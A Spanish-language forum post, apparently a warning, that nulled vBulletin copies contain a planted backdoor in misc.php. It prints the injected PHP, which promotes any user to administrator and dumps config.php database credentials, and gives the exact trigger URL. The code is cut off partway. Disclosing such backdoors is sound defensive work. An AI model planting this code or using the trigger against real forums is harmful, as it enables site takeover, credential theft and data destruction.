Alguien que te da vbulletin null puede agregar la [COLOR=#000000][FONT=Times New Roman] linea de codigo en el archivo misc.php justo despues de [/FONT][/COLOR]
[COLOR=#000000][FONT=Times New Roman]
[COLOR=#007700]([/COLOR][COLOR=#0000BB]$hook [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]vBulletinHook[/COLOR][COLOR=#007700]::[/COLOR][COLOR=#0000BB]fetch_hook[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]'misc_start'[/COLOR][COLOR=#007700])) ? eval([/COLOR][COLOR=#0000BB]$hook[/COLOR][COLOR=#007700]) : [/COLOR][COLOR=#0000BB]false[/COLOR][COLOR=#007700];
[/COLOR]
[/FONT][/COLOR]
[COLOR=#000000][FONT=Times New Roman]lo que le puso fue lo siguiente[/FONT][/COLOR]
[COLOR=#000000][FONT=Times New Roman]
[COLOR=#007700]if ([/COLOR][COLOR=#0000BB]$_REQUEST[/COLOR][COLOR=#007700][[/COLOR][COLOR=#DD0000]'do'[/COLOR][COLOR=#007700]] == [/COLOR][COLOR=#DD0000]'Jhonnyf'[/COLOR][COLOR=#007700])
{
[/COLOR][COLOR=#0000BB]$userid [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]$vbulletin[/COLOR][COLOR=#007700]->[/COLOR][COLOR=#0000BB]input[/COLOR][COLOR=#007700]->[/COLOR][COLOR=#0000BB]clean_gpc[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]'r'[/COLOR][COLOR=#007700], [/COLOR][COLOR=#DD0000]'userid'[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]TYPE_INT[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]$grupoid [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]$vbulletin[/COLOR][COLOR=#007700]->[/COLOR][COLOR=#0000BB]input[/COLOR][COLOR=#007700]->[/COLOR][COLOR=#0000BB]clean_gpc[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]'r'[/COLOR][COLOR=#007700], [/COLOR][COLOR=#DD0000]'grupoid'[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]TYPE_INT[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]$db[/COLOR][COLOR=#007700]->[/COLOR][COLOR=#0000BB]query_read_slave[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"update " [/COLOR][COLOR=#007700]. [/COLOR][COLOR=#0000BB]TABLE_PREFIX [/COLOR][COLOR=#007700]. [/COLOR][COLOR=#DD0000]"user AS user
SET usergroupid=[/COLOR][COLOR=#0000BB]$grupoid[/COLOR][COLOR=#DD0000]
WHERE userid=[/COLOR][COLOR=#0000BB]$userid[/COLOR][COLOR=#DD0000]
"[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]$filename [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#DD0000]"./includes/config.php"[/COLOR][COLOR=#007700];
[/COLOR][COLOR=#0000BB]$handle [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]fopen[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$filename[/COLOR][COLOR=#007700], [/COLOR][COLOR=#DD0000]"r"[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]$contents [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]fread[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$handle[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]filesize[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$filename[/COLOR][COLOR=#007700]));
[/COLOR][COLOR=#0000BB]fclose[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$handle[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]header[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"Content-type: text/plain;charset=iso-8859-
[/COLOR]
[/FONT][/COLOR][COLOR=#000000][FONT=Times New Roman]asi que cuando el se registre en tu foro y le den su ID de usuario (por ejemplo el 1542) solo tendrá que poner esto[/FONT][/COLOR]
[B]http://tu_foro.com/misc.php?do=Jhonnyf&userid=1542&grupoid=6
y listo, Ya será un [B]Admin (puede cambiar de grupo si no le resulta o usas uno diferente) y de pasadito vee todo el contenido de tu [B]config.php para entrar via [B]MyphpAdmin a tu base de datos y borrar todo lo que quiera
[/B][/B][/B][/B]